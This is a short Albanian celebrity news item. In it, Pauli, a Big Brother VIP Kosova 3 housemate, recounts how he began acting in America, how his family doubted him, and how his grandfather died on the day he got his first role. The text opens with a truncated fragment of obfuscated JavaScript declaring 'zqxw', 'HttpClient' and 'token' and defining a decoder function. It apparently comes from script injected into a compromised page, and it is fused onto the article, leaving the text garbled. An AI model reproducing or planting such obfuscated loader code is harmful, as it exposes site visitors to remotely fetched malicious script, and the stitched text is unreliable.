;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Befason Pauli, zbulon rrugëtimin e tij të aktrimit në Amerikë!

By

Banori i Big Brother VIP Kosova 3, Pauli ka rrëfyer detaje nga jeta e tij profesionale në Amerikë.

Në një bisedë me Gresën, Pauli ka treguar se si nisi rrugën e aktrimit, duke dhënë detaje interesante në rrugëtimin e tij.

Ai u shpreh tha se kur e kishte marrë rolin e parë, nuk i kishte besuar askush, madje as vëllau i tij që jeton në Amerikë.

“Kur e kam marrë rolin e parë askush nuk e besoi, vetëm nëna ime dhe gruaja ime. Bile vëllai im i madh atje hiç, më thojke ti u bëre nga Prizreni me ardhë këtu (Amerikë) me u bë aktor…!”, rrëfeu Pauli.

Pauli duke vazhduar rrëfimin e tij tregoi që mu në atë ditë që kishte fituar rolin, i kishte vdekur edhe gjyshi, e që për të cilin thotë se edhe e shtyu drejt audicioneve.

“Kur e mora këtë rolin e parë atë ditë më ka vdekur gjyshi, u zgjova në mëngjes e pash mesazhin nga mami, u shyma sepse jam rritur me të. Por çka më shtini me shku ishte se une tre ditë më para fola me të (gjyshin) me kamerë dhe e diskutova, më tha ‘mbyti krejt’,  i thash mos ta ndin gjysh dhe thash me vete e gjithë kjo ndodhi për një arsye…”, vazhdoi tutje ai.

Artikuj të ngjashëm